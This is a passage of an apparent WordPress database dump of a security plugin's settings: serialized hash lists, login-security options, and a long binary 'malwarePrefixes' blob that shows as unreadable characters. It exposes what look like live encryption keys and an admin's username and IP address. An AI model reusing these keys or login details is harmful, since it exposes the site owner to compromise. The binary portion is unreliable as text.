32:\"e3dcfe0b971c48d3dea74ff0d4432a80\";}i:1020;a:2:{s:7:\"ignoreC\";s:32:\"ec386eb4fa6e38453f8e860d9c9382fc\";s:7:\"ignoreP\";s:32:\"ec386eb4fa6e38453f8e860d9c9382fc\";}i:1021;a:2:{s:7:\"ignoreC\";s:32:\"7f75118b966c6f446a54d80028149a87\";s:7:\"ignoreP\";s:32:\"7f75118b966c6f446a54d80028149a87\";}i:1022;a:2:{s:7:\"ignoreC\";s:32:\"fc0057c52f5d4c6ed73ec967241ffef9\";s:7:\"ignoreP\";s:32:\"fc0057c52f5d4c6ed73ec967241ffef9\";}i:1023;a:2:{s:7:\"ignoreC\";s:32:\"5513b4c8cbb48a0ff3efb40182737c6a\";s:7:\"ignoreP\";s:32:\"5513b4c8cbb48a0ff3efb40182737c6a\";}i:1024;a:2:{s:7:\"ignoreC\";s:32:\"210ef1600c189a1a50c6634fe85b6a9c\";s:7:\"ignoreP\";s:32:\"210ef1600c189a1a50c6634fe85b6a9c\";}i:1025;a:2:{s:7:\"ignoreC\";s:32:\"43372fb66acbdebaccc9f85c1bbafcab\";s:7:\"ignoreP\";s:32:\"43372fb66acbdebaccc9f85c1bbafcab\";}i:1026;a:2:{s:7:\"ignoreC\";s:32:\"851710677c77cb624c426d44803f0e42\";s:7:\"ignoreP\";s:32:\"851710677c77cb624c426d44803f0e42\";}i:1027;a:2:{s:7:\"ignoreC\";s:32:\"243934e3042db09160e14b11f2f1971e\";s:7:\"ignoreP\";s:32:\"243934e3042db09160e14b11f2f1971e\";}i:1028;a:2:{s:7:\"ignoreC\";s:32:\"59a6a6b75276bd729a38c172ff9956dc\";s:7:\"ignoreP\";s:32:\"59a6a6b75276bd729a38c172ff9956dc\";}i:1029;a:2:{s:7:\"ignoreC\";s:32:\"26ff1619c81d95bfae3d2f224f9a695a\";s:7:\"ignoreP\";s:32:\"26ff1619c81d95bfae3d2f224f9a695a\";}i:1030;a:2:{s:7:\"ignoreC\";s:32:\"82a71eb8d6aeb42a3dd14a45d6d82df8\";s:7:\"ignoreP\";s:32:\"82a71eb8d6aeb42a3dd14a45d6d82df8\";}i:1031;a:2:{s:7:\"ignoreC\";s:32:\"0544adec22b9858175de1d07afa93605\";s:7:\"ignoreP\";s:32:\"0544adec22b9858175de1d07afa93605\";}i:1032;a:2:{s:7:\"ignoreC\";s:32:\"61b54395e938702a9e51b5e2e093bef3\";s:7:\"ignoreP\";s:32:\"61b54395e938702a9e51b5e2e093bef3\";}i:1033;a:2:{s:7:\"ignoreC\";s:32:\"b36c45c120280c4d59d5849ee1cae335\";s:7:\"ignoreP\";s:32:\"b36c45c120280c4d59d5849ee1cae335\";}i:1034;a:2:{s:7:\"ignoreC\";s:32:\"647481937ecde878915aedd737eb31e6\";s:7:\"ignoreP\";s:32:\"647481937ecde878915aedd737eb31e6\";}i:1035;a:2:{s:7:\"ignoreC\";s:32:\"94e67b2edcffcdd3d62749aa441aa380\";s:7:\"ignoreP\";s:32:\"94e67b2edcffcdd3d62749aa441aa380\";}i:1036;a:2:{s:7:\"ignoreC\";s:32:\"7a060d38057745f6e1c18fbfbaf713b7\";s:7:\"ignoreP\";s:32:\"7a060d38057745f6e1c18fbfbaf713b7\";}i:1037;a:2:{s:7:\"ignoreC\";s:32:\"ed7a9ae4c873bb8306a08d3aff04cd22\";s:7:\"ignoreP\";s:32:\"ed7a9ae4c873bb8306a08d3aff04cd22\";}i:1038;a:2:{s:7:\"ignoreC\";s:32:\"b1db4ea0b9e5c24228208c9c987aaa54\";s:7:\"ignoreP\";s:32:\"b1db4ea0b9e5c24228208c9c987aaa54\";}i:1039;a:2:{s:7:\"ignoreC\";s:32:\"52e9d7b6fb7e48dd0d98439d3dcf67c2\";s:7:\"ignoreP\";s:32:\"52e9d7b6fb7e48dd0d98439d3dcf67c2\";}i:1040;a:2:{s:7:\"ignoreC\";s:32:\"82413b1492ab2a3eafc0a94aa1274e83\";s:7:\"ignoreP\";s:32:\"82413b1492ab2a3eafc0a94aa1274e83\";}i:1041;a:2:{s:7:\"ignoreC\";s:32:\"262cb55b82879b48d47a3c642552e69d\";s:7:\"ignoreP\";s:32:\"262cb55b82879b48d47a3c642552e69d\";}i:1042;a:2:{s:7:\"ignoreC\";s:32:\"0f8af863ae161839eabeaef44717ebab\";s:7:\"ignoreP\";s:32:\"0f8af863ae161839eabeaef44717ebab\";}i:1043;a:2:{s:7:\"ignoreC\";s:32:\"e5c7b505858401e877742cdc665cdea5\";s:7:\"ignoreP\";s:32:\"e5c7b505858401e877742cdc665cdea5\";}i:1044;a:2:{s:7:\"ignoreC\";s:32:\"3d4e970fbabbc3d0094bf1a73a058f47\";s:7:\"ignoreP\";s:32:\"3d4e970fbabbc3d0094bf1a73a058f47\";}i:1045;a:2:{s:7:\"ignoreC\";s:32:\"462ed9a4fe18173dbbe9d28fe9ab5f2a\";s:7:\"ignoreP\";s:32:\"462ed9a4fe18173dbbe9d28fe9ab5f2a\";}i:1046;a:2:{s:7:\"ignoreC\";s:32:\"c68e0329729bbf16d36ddf6e6fc3da8e\";s:7:\"ignoreP\";s:32:\"c68e0329729bbf16d36ddf6e6fc3da8e\";}i:1047;a:2:{s:7:\"ignoreC\";s:32:\"ae3328f9a2ded2d085046ca6c89a669f\";s:7:\"ignoreP\";s:32:\"ae3328f9a2ded2d085046ca6c89a669f\";}i:1048;a:2:{s:7:\"ignoreC\";s:32:\"7f848b147e97f64cefb7d54510cc87d5\";s:7:\"ignoreP\";s:32:\"7f848b147e97f64cefb7d54510cc87d5\";}i:1049;a:2:{s:7:\"ignoreC\";s:32:\"249c8e6bbd394ef7be9b79b4d99c943d\";s:7:\"ignoreP\";s:32:\"249c8e6bbd394ef7be9b79b4d99c943d\";}i:1050;a:2:{s:7:\"ignoreC\";s:32:\"07fb644bd79dee4fb068d473b9b40e5f\";s:7:\"ignoreP\";s:32:\"07fb644bd79dee4fb068d473b9b40e5f\";}i:1051;a:2:{s:7:\"ignoreC\";s:32:\"eb2802abf411d2eb38009979d445c3d5\";s:7:\"ignoreP\";s:32:\"eb2802abf411d2eb38009979d445c3d5\";}i:1052;a:2:{s:7:\"ignoreC\";s:32:\"3c87d24f5f0f7b4dbf3ad06822857695\";s:7:\"ignoreP\";s:32:\"3c87d24f5f0f7b4dbf3ad06822857695\";}i:1053;a:2:{s:7:\"ignoreC\";s:32:\"7076ed5c2310054245df9e953a9243fc\";s:7:\"ignoreP\";s:32:\"7076ed5c2310054245df9e953a9243fc\";}i:1054;a:2:{s:7:\"ignoreC\";s:32:\"ce6ce71260fb7a94934508a15d09ec8a\";s:7:\"ignoreP\";s:32:\"ce6ce71260fb7a94934508a15d09ec8a\";}i:1055;a:2:{s:7:\"ignoreC\";s:32:\"daccd9549f066446002a5a8cc313a27a\";s:7:\"ignoreP\";s:32:\"daccd9549f066446002a5a8cc313a27a\";}i:1056;a:2:{s:7:\"ignoreC\";s:32:\"55cd4e791cea9ca2c821f4e8fa25cfc8\";s:7:\"ignoreP\";s:32:\"55cd4e791cea9ca2c821f4e8fa25cfc8\";}i:1057;a:2:{s:7:\"ignoreC\";s:32:\"ac6782da0ff4fead9d1c18327c915800\";s:7:\"ignoreP\";s:32:\"ac6782da0ff4fead9d1c18327c915800\";}i:1058;a:2:{s:7:\"ignoreC\";s:32:\"6c3a48a8a4c3a2d0faab64db4eb2ec08\";s:7:\"ignoreP\";s:32:\"6c3a48a8a4c3a2d0faab64db4eb2ec08\";}i:1059;a:2:{s:7:\"ignoreC\";s:32:\"43cb6332c8485b3a49303662949bfc64\";s:7:\"ignoreP\";s:32:\"43cb6332c8485b3a49303662949bfc64\";}i:1060;a:2:{s:7:\"ignoreC\";s:32:\"15463af19acb2eed67cd3ca9de55a6be\";s:7:\"ignoreP\";s:32:\"15463af19acb2eed67cd3ca9de55a6be\";}i:1061;a:2:{s:7:\"ignoreC\";s:32:\"06c795350bec75d2ce566cbede0d347f\";s:7:\"ignoreP\";s:32:\"06c795350bec75d2ce566cbede0d347f\";}i:1062;a:2:{s:7:\"ignoreC\";s:32:\"c1c9fe60a8c096a8a20bbf7015f3871f\";s:7:\"ignoreP\";s:32:\"c1c9fe60a8c096a8a20bbf7015f3871f\";}i:1063;a:2:{s:7:\"ignoreC\";s:32:\"15b970508b4d0a004c1e45721d834346\";s:7:\"ignoreP\";s:32:\"15b970508b4d0a004c1e45721d834346\";}i:1064;a:2:{s:7:\"ignoreC\";s:32:\"b3bc02aa0f27575b19224e2181d1ce25\";s:7:\"ignoreP\";s:32:\"b3bc02aa0f27575b19224e2181d1ce25\";}i:1065;a:2:{s:7:\"ignoreC\";s:32:\"f3317ab6263ec4e58c551d49f60ea93a\";s:7:\"ignoreP\";s:32:\"f3317ab6263ec4e58c551d49f60ea93a\";}i:1066;a:2:{s:7:\"ignoreC\";s:32:\"ad87c9bda0636d9e3becc41e232132bd\";s:7:\"ignoreP\";s:32:\"ad87c9bda0636d9e3becc41e232132bd\";}i:1067;a:2:{s:7:\"ignoreC\";s:32:\"8d7893ef2aec7bf6ddef99053b943c0e\";s:7:\"ignoreP\";s:32:\"8d7893ef2aec7bf6ddef99053b943c0e\";}i:1068;a:2:{s:7:\"ignoreC\";s:32:\"5766963e5958903d9ca63795db424fe9\";s:7:\"ignoreP\";s:32:\"5766963e5958903d9ca63795db424fe9\";}i:1069;a:2:{s:7:\"ignoreC\";s:32:\"5b1f9af64949575fc6b31baa6bfa5e0c\";s:7:\"ignoreP\";s:32:\"5b1f9af64949575fc6b31baa6bfa5e0c\";}i:1070;a:2:{s:7:\"ignoreC\";s:32:\"e53e5a990d9d5d4d63c7708a00441976\";s:7:\"ignoreP\";s:32:\"e53e5a990d9d5d4d63c7708a00441976\";}i:1071;a:2:{s:7:\"ignoreC\";s:32:\"7933d69e807f6824421217f21791eb09\";s:7:\"ignoreP\";s:32:\"7933d69e807f6824421217f21791eb09\";}i:1072;a:2:{s:7:\"ignoreC\";s:32:\"17c9f91e14a70c99359bf78acd292d8c\";s:7:\"ignoreP\";s:32:\"17c9f91e14a70c99359bf78acd292d8c\";}i:1073;a:2:{s:7:\"ignoreC\";s:32:\"84a34210d0fb0557c5a39e95eab58b4e\";s:7:\"ignoreP\";s:32:\"84a34210d0fb0557c5a39e95eab58b4e\";}i:1074;a:2:{s:7:\"ignoreC\";s:32:\"92afe2b8fcb1767a8b5c4390c3f77aa0\";s:7:\"ignoreP\";s:32:\"92afe2b8fcb1767a8b5c4390c3f77aa0\";}i:1075;a:2:{s:7:\"ignoreC\";s:32:\"acb31b7485fb892e1e886e576702ba8d\";s:7:\"ignoreP\";s:32:\"acb31b7485fb892e1e886e576702ba8d\";}i:1076;a:2:{s:7:\"ignoreC\";s:32:\"0b8d6c7fb674f2575747d21a5d382c8e\";s:7:\"ignoreP\";s:32:\"0b8d6c7fb674f2575747d21a5d382c8e\";}i:1077;a:2:{s:7:\"ignoreC\";s:32:\"d5c7572b0009b28bea4869a658a09c6f\";s:7:\"ignoreP\";s:32:\"d5c7572b0009b28bea4869a658a09c6f\";}i:1078;a:2:{s:7:\"ignoreC\";s:32:\"f608201896e45886ab632bbf130ca0d8\";s:7:\"ignoreP\";s:32:\"f608201896e45886ab632bbf130ca0d8\";}i:1079;a:2:{s:7:\"ignoreC\";s:32:\"bf17566a3519e56a891a201775110e93\";s:7:\"ignoreP\";s:32:\"bf17566a3519e56a891a201775110e93\";}i:1080;a:2:{s:7:\"ignoreC\";s:32:\"51fab51ed6fc1a7dd5f2c51582cc81d2\";s:7:\"ignoreP\";s:32:\"51fab51ed6fc1a7dd5f2c51582cc81d2\";}i:1081;a:2:{s:7:\"ignoreC\";s:32:\"d4c113eb74c7102d2789dfe28d4639a3\";s:7:\"ignoreP\";s:32:\"d4c113eb74c7102d2789dfe28d4639a3\";}i:1082;a:2:{s:7:\"ignoreC\";s:32:\"0299bfbf56d2a15262faf3381e33f60c\";s:7:\"ignoreP\";s:32:\"0299bfbf56d2a15262faf3381e33f60c\";}i:1083;a:2:{s:7:\"ignoreC\";s:32:\"3ecc415573a91b790455e21663566f76\";s:7:\"ignoreP\";s:32:\"3ecc415573a91b790455e21663566f76\";}i:1084;a:2:{s:7:\"ignoreC\";s:32:\"30cfd13ad9a8b10c1b0c2af310a4e363\";s:7:\"ignoreP\";s:32:\"30cfd13ad9a8b10c1b0c2af310a4e363\";}i:1085;a:2:{s:7:\"ignoreC\";s:32:\"6edb845c96e4dba332e9b4d3df00549f\";s:7:\"ignoreP\";s:32:\"6edb845c96e4dba332e9b4d3df00549f\";}i:1086;a:2:{s:7:\"ignoreC\";s:32:\"4ddb4414c7495dc0cdae66ed31739796\";s:7:\"ignoreP\";s:32:\"4ddb4414c7495dc0cdae66ed31739796\";}i:1087;a:2:{s:7:\"ignoreC\";s:32:\"8ce8e267edace16dc8ad3cca6b5f6868\";s:7:\"ignoreP\";s:32:\"8ce8e267edace16dc8ad3cca6b5f6868\";}}','yes'),('email_summary_dashboard_widget_enabled','1','yes'),('email_summary_enabled','1','yes'),('email_summary_excluded_directories','wp-content/cache,wp-content/wflogs','yes'),('email_summary_interval','weekly','yes'),('encKey','a07bb17be3135193','yes'),('fileContentsGSB6315Migration','1','yes'),('firewallEnabled','1','yes'),('geoIPVersionHash','a1214acac1b3109ae51eae6349fb045cef4b53346ee65840edbf84fa0fad9677','yes'),('hasKeyConflict','0','yes'),('howGetIPs','','yes'),('howGetIPs_trusted_proxies','','yes'),('isPaid','','yes'),('keyType','free','yes'),('lastAdminLogin','a:6:{s:6:\"userID\";i:1;s:8:\"username\";s:23:\"AAD22133312errousGTRF44\";s:9:\"firstName\";s:0:\"\";s:8:\"lastName\";s:0:\"\";s:4:\"time\";s:27:\"Wed 13th April @ 10:22:12AM\";s:2:\"IP\";s:14:\"185.175.113.72\";}','yes'),('lastAttackDataSendId','12643','yes'),('lastAttackDataSendTime','1675200308.131732','yes'),('lastBlockAggregation','1675160546','yes'),('lastBruteForceDataSendTime','1629375447.624000','yes'),('lastDailyCron','1675160544','yes'),('lastDashboardCheck','1675160545','yes'),('lastEmailHash','1670720473:97008a3888a9ab17ea960e7f2ffb5169','yes'),('lastFalsePositiveSendTime','1650133174','yes'),('lastNotificationID','1077','no'),('lastPermissionsTemplateCheck','1675205057','yes'),('lastScanCompleted','ok','yes'),('lastScanFailureType','','yes'),('lastScheduledScanStart','1675048471','yes'),('liveActivityPauseEnabled','1','yes'),('liveTrafficEnabled','0','yes'),('liveTraf_displayExpandedRecords','0','no'),('liveTraf_ignoreIPs','','yes'),('liveTraf_ignorePublishers','1','yes'),('liveTraf_ignoreUA','','yes'),('liveTraf_ignoreUsers','','yes'),('liveTraf_maxAge','30','yes'),('liveTraf_maxRows','2000','yes'),('loginSecurityEnabled','1','yes'),('loginSec_blockAdminReg','1','yes'),('loginSec_breachPasswds','admins','yes'),('loginSec_breachPasswds_enabled','1','yes'),('loginSec_countFailMins','240','yes'),('loginSec_disableApplicationPasswords','1','yes'),('loginSec_disableAuthorScan','1','yes'),('loginSec_disableOEmbedAuthor','0','yes'),('loginSec_enableSeparateTwoFactor','','yes'),('loginSec_lockInvalidUsers','0','yes'),('loginSec_lockoutMins','240','yes'),('loginSec_maskLoginErrors','1','yes'),('loginSec_maxFailures','20','yes'),('loginSec_maxForgotPasswd','20','yes'),('loginSec_requireAdminTwoFactor','0','yes'),('loginSec_strongPasswds','pubs','yes'),('loginSec_strongPasswds_enabled','1','yes'),('loginSec_userBlacklist','','yes'),('longEncKey','655d7d4c82dda00b05d2df09e9a1b67ed88bdaa7eeb7902188a29f4ca63363f3','yes'),('lowResourceScansEnabled','0','yes'),('lowResourceScanWaitStep','','yes'),('malwarePrefixes','�\0\0\0\0\0\0�y8�\0�ٗ�Ν;˽sIYJ��BR$RI%Q�D�ZHJ!I+�J��H����i!*)�EE+�&~����y�y��3��3>�nj�\no>^��\'�_wB�x�1�uO�\Z� �%�e\r�?�EC��)���M�>��8)��}��uׄ�-X����1ff��m\0��\0��\0�r�a?\0xG7\0?��)��`��\0�4��D�K@�bH�\0Y�+ gZ\0�p\Z������\0��@1�Pt���180�\0�v6���. �);����ռ\Z@U�	��{\0u���\'�����@p_���F��\\q4��\0Z.=���_��\r0h�����t&�:A��!��\0]�߀�\n@7�\0��b?�g��]����;�a�l`�,[�0�`��`x�,0�`00��a����$`d�0Z�U\\\0�>��K>��&�)���/��S5��)�;0����r��=	��7�?�����`\\C`9��*XXՐ���d`��~`�6L�XK�֗_�W�6$`�����t��t/�<$p�8�7�O�\0��`�m0m��.V!����kH,�\Z����H�f�~�x8�9�����u��6~����\\����\\�`��w�<�:`^s0��\0,?\0,H{\r,8�,(N\0\\Y\0,��x,�x�\0�cO�Ӏg�#`��-��u७xx�s��/�]�\0,�%|����l���0��,���Y���g�8`����р�����]���C��\'v\0�k܀\0�& `O,�:	X��&\"@`�H h�4 8Z��܁��s`��I�\Z0XӺٛ�A@XPv�/6\"�J b�\Z \"k\0X���:��\0����Q �U5d��DG]\06=]ln��X�[V�@�.�E�����$��������.�-�ض�,��; ~�j >��N�u灄��@B�#�8�H�7H|;؁.v����+�$� i�?�s� �+\n��	؍,v4{���f7�g�o`��>�w`��^`_�N`��R<�)A��=��q���R M�6�f0\nH�/\02�K�g; �c\"�9P�0%k��Ӣ���@��D g�= �3pdQ!p��4p�Y�����@�zs �����p�N\Z�\n��t_�T�p�[B�@��I�p�m���\Z��=(��n��1\Z�Y\Z{���{%\'F�|�\0�*^�&�������)���@��(�2(OR���˧���w&W��\0��`��m=P�2��@��k@�F�:�P}��|���7:������S�����[9Z�]�r�ә\0�5G�f6\0�|�}E$p��@�x�xx8�2���/��4h�txt��8S4�π�cÀ�Q��G������^@��6�y� �<xaj��\rxi9x9Y	��^���^Kږ�m�b൷=�:$x�1x;r�)Юc��\r���	|hK:�́O|�ϻu�/���o�����]��#�[�?�@��@�����=��\r��_��Ǿ��U�����7c\"�oN)0��K��K 4M��?�Ч� |�c�@ĺD���h�-�/1\'��q�ĝ��x��x6$/�E�.���8(Z;]�ˢ@��@k@��$P2�����[߀2�hP�u:H�D�T�3���@f�\'�{�� G��ܺP��\0U�AUR\0���������~P-�E���n8��Uj饁Z��Z�|A��M��~!��Uj?�j?{*�\r���:��A��-��vpp�)8D��W�Z;�������@W��h��84-zq	8l�0�p�4�N\r_[���\r�p?8�X����\Z}M\0�]A��;A��	����@�8����.8\Z\\��}�Z����� м��{*gp�b8��\0h9v>h��h�5����JN\0�����@k�h��\rh}��������lmN^m�A�oE��/�@;�~��U8i�?�>&��/\'?O\0�|D@�@\'pZ���z!�<�8=�]#~�3g�3�G�35\r��+G�Y�n�n����_A�����!8��X����yE������������\r�$%�!o=��=Ꟁ���g��p�\0��/��y�h�ApQ�\Z�K���:R.��.���n���烾��K=��G��K�T�k���e�W�d�+�OW|��7]W>����G0آ��4W]\0W�X	���{0���?^��X�uǀ�#߂�������!��M��u+>����o��Q>���3��F�4���\0�^5	�>�	F>n���\\]�< ��\r\np��Lp��+��Vf=�u�7�m�2p[�Wpۉ}�\'0nb�����\0����I�`’,p;�Ll��6��G��X)���&��\n&�?w}H����{{������=\0�߯�*S�x��-��e�`ڑ+`�r0�\r�>hxp�D0�[=���*p灇�^\0�R�lU�ݞ\0�\0s���1��c/����U`�\"3�8_R\n��̛�\0�5�������12� y6X��,��<�x��9���*XX�,��`�3%O���M�Y+s�<�&<��\r,60K�@��0<��0lX��e�3��J�B��0�+�.+�g������)7�gxy�E��\\��H��+��FE�W����o��?�E<���k�C���9u���5�����,���ޮ�o��wu�w�^�Ƹ������\'�����Р�	>\nj�\0}qw���=�`S�=�-�{(�\'o��i�$l���-#g����/����_�$�//Ԃ��+�W�?�����u\0��	�s�ߵ���z����{�^�C��ct<�1<\0�v�����m�ON�����s��ۧ�O/�� �����~�U��>}8��X	v�]�:��X\nv�{�D�{�N�?�1���b��o��2_�W�v�W���u6���\Z��#����?�࿲0����k;��W; ����47C���p� #���\n{�0\0�v�|���!�b9�.y� l����1��m#!r�\'��\Z\n��!ѼXH�%�:+!驫���[Hfɾ\\��SŐ��-D\ri���\'!���h�)1Rj/��w, ά��!�?H0�	VG!a�$��49� �wA��4_HG{��O\r��\r�t��<��{\r���˟�}����W���wo��@C��A�ܞA�|A�J�a�� Â+Ј�5��Yrh��#���\Z��\n2�%!�Fi-�F�F\'��L�4Bcd%И+ 3�dȜ\"���]��-��8�$Ȳp*dY�BV�@�\'�C,t �$dm�MX�� ��k �����E��rHQB�sS��iِ�hڪ����7ȹ�;���l�\0��\0M\'C�h��.�ճr]=r�r}��5*�=�$4O��_<	-��<�C �$�IxA�s]���4h��Bo3h�=Z4|=��+���Sȫv\'��y�ZCK<�AK��%ի!�!� �x��}����\Z ��� �7w����OfB+�\r@+ch垅�ʻá�o@+{C���P`�;h;Z5�Zդ�����\"h5�v7�V��B�/�Ck��\Z�PH�(t:��_����d�(��!��;�~�h�R	�,�	5�brnA��VB�+>A[��C[w|��,=�I$�03J�9\0%��\nm�j����Ў�(ɴJ��%m�/�%��\n%_�vM�\n�����q������OA)g_@)/ڠTq%t���V��O|\0L��	�\ne��A�fYP�(����9O�p�y(kH�k��CG8tdit���ȓ�(g��{�k	_�\r?~��ʷ̀�#G@�C�w�C\'�_�	���	�YЉ�[�����*�Z�j}	�B��CE�T�9*�>*�	Ag\n~CŊ�Pq�*�?*)̂JN�ι*�sw�C�cʠ�p�|�7t��T��2T�AW�A3��%/	t�	UM_U�q��n]]M�B�G�k	��k��C5��\r��P�Gts�c�L�X��9\0�i��:� ��:�׮ݏ�������z��j=��5n��\'BO�@����@��uPwj3���%Y�k�\r�z��M�z�mrԾ9z���q�����eԑiu�\nuz��:�ʠO�Z��~MЗ����oз�F��N��r��	u�������{_�ks��3zPoU�s�m�g�aWA<R�>�{п�l��F���a�4���q0�z�m�`��F��u�w���`�&�/Ä�r���܂I`L�������(�	����[KM�%\'��Kɰ�,\n���e�?a:*��_��F7`e�V���&0C�`N�s��`��˰��qXX��ΰ�t5,4�\Z�dX�Ck���:\"�u|&�:m��Px��}>���!����]��{�C�����0�<��6t>�<\0�4�\0���9\r�`�Ol\\k	�|��M�Y��^���$6w���h�-���V6k`��E�x|�=غ�lS�4��m�6¶_��R��ė�n�>�~�!<9�v�};\\4�\r��S�o���i�Ӫ_�ӞR���(�y�\rع��B?�]��*��q�	��gN�\r��0�gfn�g��nR`�����b��xN�<�P��=�w�/ج�=`]x��x�>xѹ��W�?x��}x�[��.��|t�}F$����qx\r��0��Px�����C�e�xxY�jxY�+�Oo�U	�����\r��K�a�����g\r���\0^Yp�	ژÁk���\Z��`>޸^=���E������}A�a�p�[���mሳY����p��y1	����#�o�Q3]��8�t�1��1�������l�!���ǂ�������;x[�(x�6�sy\0Ǐ��W-��__��;���hxǑ�pҴhx\'��>��v�#��y��;�8���x_�{T�I����S��q�k��C�7��4[N[��_n��o����[��\r�s78c�6���g�	gf���K:���#�M�>�Q�>z�>f�>�L�yG��pޣ�p����	\"\n>�p>�>��	������,��;§N��]Y��E��\"�H�̰��ٚ��mK��..Yu.�9>�r|��<��.c��S���\rp���!p�m\\u�!|��1�Z�%�&g.|��\r��µ�p�v����-#�62�ck�qk����u��.s����We?�q�<�����m@�>�n�7�o���Ï�V�M�Z�ǧ�Of��ͻ����g5��w���~Q9n=L�/=��W+��W�?�U���H����^�]�-��߫w���6��X���F��;�~)��o�5x*���o��Mg��w�r���\r��ow��w?6�{\Z��=�s�1��ý:���˫�_�#�_�\'�����?^��K��#�_��p��?[<�\0���>�\"@�n�>���7���So#h�}=���D���^q!�D<9\0�ND$�!��/��R��9!����&��MD���u$B��O�#J����a�L�}؊p�o���G_ �sW�ND��Q�G�Dxv\nѲ��hE� Z�m�LD���n_�h\rD�� ���Gt��Ct~5\"�����ŝ��oD��D����G1�{��NF�>�@�!��!�1�����\\w1\n�@�֚\"F}��v����蟦��}bڸ��\'2f�>bVe��K& �^o�]�\"u\'2����[j��������X*G#��g+ub�������	�%Ґ�u}��\\d��aȤc+{{	2e����q�{q(�F�!N:��i�a�yC�c*�|<q>�q�rq9}��<�^����	2���Պ���%�Y���[�7�1�3�\Z2����j\"2�B\Z2��)2�������3�D�﹇̯Z�,��x��!a%�g��s�x��,ܾY�!^��o���@��#KjZ��	�R}Cd�U���C���2��h$�g����A��� +N�B�UYH�*Yٽ	\\�	����F�m�U�?�U�4�(ІǝE�O�BV��EV7C�Lđ5G�	)X��N[��֤#�KA$�Zd�n�n�sd�\"Y���T�l\0��h�$:�]q�q�G6��Ȗ)�ȶ�Ñm)�x�j$��$,Z�$���$$E�����w�7J�$�,$�\r�s�ٹ��|����\"{��!{�u���W {�#{?mF�]@�Sϐ��> ��� )��\")�����\ZER��CR�7\"\"� �#i[� u���$$s�x�и��a�.�pb3�u�E��: ٽ��{��޻������ȱ��H�6=���!yb��J9y�9Ym����i�E�hrr��\0r&�\n9S�9k�9;�3r��R<�)��EJ�,�s}<R:�7R�>�P���͡���gH�D����8����rI�\\?\Z�<�B.�!W^k#��� �w�*�&�*��:aR�%�NmDj��Gj�n#7:J�Z��H��H�o䦤�َ ��!���QH]�1r/[��{\'r�-����4�#��U\"��5H���)�G{�ȓ�7��{���ޅH�ȳ,K�e�$��1�¿yy�yE�!m�H��8���\Z��e�&Nyk�y��yw�y�ꁴK;���H{m?�8��C����\\��v�=D:_�\"�V|C>��@>�8��B�,[�|)�B���@��.B���|�ь��F~���h� ���ހR�7��-���4{��>z�}���U���@�&; }K�H�3����	�_p�o�������(��\'\nu���:	E��ʛ(\Z�Ek�(�tBq�(Y����EŢ�ش��?�ʮOD����B�3�PF/e>c(ې�r#�P��pTs�d5ܨA�<~���P�q*T��/��2��ߠz�P��RT��7�?�F�����٨�Aj-B��CGOG���I�q��:�l�LP�f��Q�C�PB-���]j��5:��\":�7�\"j�\Z@�\\�Va7��{e脕��5�����c�Q�}cщ��>�N޲�ǡ�uPǙCQ��:�T�g�i�xt����=u)�B]ζ�ӱ2t�z=�x:Ct�ɖ�n���[e;:���Ξzu{	�S��΍[��뚌�|�.0��z� �{�zT�.�=\r�ђ�>�E�o���6����[r�k�DW4�E����������Е���+=�+�`te�>��ڄ�JnD����գo��/;�!cס�ޛѰ\'4|G,\Z��]k�]?�-�!x��\ZI8����\'�E7��\Z�i.B7��E7���/1hlc9�5e\Z�*G_�	�S��_���/��[Sѝ�5h�Lc4����%Cw���nE\r��>�}��7n�o����5��wM1�@S�mBS�X���BS���G��Ѵ}Uh��z0V�f�|�f��@3�բ�l|��#���\nѬ1uh֭�hV�4g��M@s�\"М�X4�e(��a$z�d4����-�E����(F󲖡�3t�|��h~�4��=qFO��CO�m@X-ЎEƬCN�FO��BO{FO�?��$�%������Z�B�0�L�\rZ�t-�u-+�������G/�e�W�����\\��޷�U���U���aNh5���rF�+��k�k%��{��k_����X�z�bZk�֮qBoR����^���z�v�(�Κ����}��}Wz?&\0}([�>\\��>�h�I��a�6��G���h�m�T�>��G��u�S���3}Vb��씢-���w�G��9���z���Or\"��5}5�}e݇�Z�}�}=�	}=���Q(�nrm��\Zmc��OtE���D?��G;l�G/�c���,�v�}B?�߃~�<�\Z�~i�F�jMF��_D��F���F��\rh���u���ȣݣ���C��s�ў���/�ץ��F�t�B�����C�!S�T�o֍�G�@�3�����\0R���O0�\Z����cX{������_~?\r#�]0��;��v�D�yLl���}�0�lLb`�I��b��w1ن����Q�y�qS\Z�ĸ32�/?��j�b��N�z�-L}�S��a��S��O�5����i�b�U�0��	��Ssl�n�{ Ӄ0��?1��W���I���H���SlhB\"6,~\r6�[fZ�\r�/��_����*�F����[�O��5���/���� ̴&c��/k�{�663\Z[�g��T�Y�,�1��l��Ll|�-6a�	f3�/f3�f˿�l�1ۨ��������$�6��6i���Y�MY�M)��9�a�m���a7���C�i�6�;�2s�Ha�?����،#��Y5 �&�ܨc��n̝s���gbs�+������ߞؼ�7ؼo?��6�q)�\0��-h��<�as�1��=����g�R����[�S�y��Ńa�������%?�`>�K�e��a�&]���b+z���!�����tލ�|5|q|{[5e4���:��\\��g$Bta!�����X����L�ª�`�g���ᳱ�uغ��u�؆ǽ؆g�\r_���]�X��X��Xtq>��܄m��m�mN8�m>t��۲��=����Ƕf����Z��I\rX�x�p=��K���m��a�U��*����x;K�%ݷ�v��Œ�Yl����b��plϔ5؞��ؾ���Ik��LK=i���.�\'`��ð���X�����4,3x\rvh���찏?�e�˺n�e�b�i4�c܃��;�N��-�Ž�:���c����<t�\'��婶byw\r�|h!v�;	��N���?�\nDc��-��t�`E�qX�u.�&�3��ؙ�u���,V�JNJ���-!Xɡ�XI�e�\\�F�t�9���+���J�i��꿼%��D��u��!%V������*n�*���KZ�إo[��z�ؕ/Xe�n��;�]�f��?n`�mO�k\'7b�\rcח�b�o.���\r�jb��={����\r�U�\r�c؍;؍�X-7\r�}������	�]=����!��:�Z����%��ѵX��9X�%�5B_�\'�]Xs�%�lt�,<k�V���2�Z��X�3����b���c/Wb//Ea��-��0[��7�w�����g�}o���>��ľ*����X��j�+{2�]���,�~G��ҰQY�/,��\\������vZ����?N����#���H�o�B������,��܇;q�������\0G<�q\\�\'M\'��q�	\\rk.��ҟSq��hj�Y�h��ӊs��qu�F\\(݂kt��\Zc�m��k߶�5�:��:�p�\rJ|��>d�5>d�[\\�R���z۾�z{�p��6�~�]���i���B|��>��V��Gtō��q~n��nrt=>*�<>�D%>��M���O�t`�]���8��ռ�͇|��m���,n�m�[���؄p|l�;|z\n�<����Oŭn���u���=��w8�v��\'T��mln�6�z���[�M�-n�	����]7�v�zp�w�����`k|J�O�?w[�;M���;Mq�#\r�Ԙd|jZ��݅O���;�